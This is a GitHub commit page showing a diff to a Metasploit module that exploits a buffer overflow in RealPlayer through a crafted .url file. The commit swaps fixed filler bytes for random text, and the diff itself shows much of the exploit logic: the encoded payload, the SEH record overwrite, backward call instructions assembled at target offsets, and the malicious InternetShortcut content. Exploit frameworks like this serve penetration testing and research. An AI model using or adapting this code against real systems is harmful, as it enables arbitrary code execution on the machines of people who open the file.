Skip to content

Commit e895ccb

Browse files
author
jvazquez-r7
committed
added random string functions
1 parent fec9890 commit e895ccb

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

modules/exploits/windows/fileformat/real_player_url_property_bof.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -70,13 +70,13 @@ def initialize(info = {})
7070
def exploit
7171

7272
buffer = payload.encoded
73-
buffer << "A" * (target['OffsetOne'] - buffer.length) # Open the file via double click
73+
buffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click
7474
buffer << generate_seh_record(target.ret)
7575
buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetOne'] + 8}").encode_string
76-
buffer << "A" * (target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player
76+
buffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player
7777
buffer << generate_seh_record(target.ret)
7878
buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetTwo'] + 8}").encode_string
79-
buffer << "B" * 7000 # Generate exception
79+
buffer << rand_text(7000) # Generate exception
8080

8181
content = "[InternetShortcut]\nURL="
8282
filecontent = content+buffer

0 commit comments

Comments
 (0)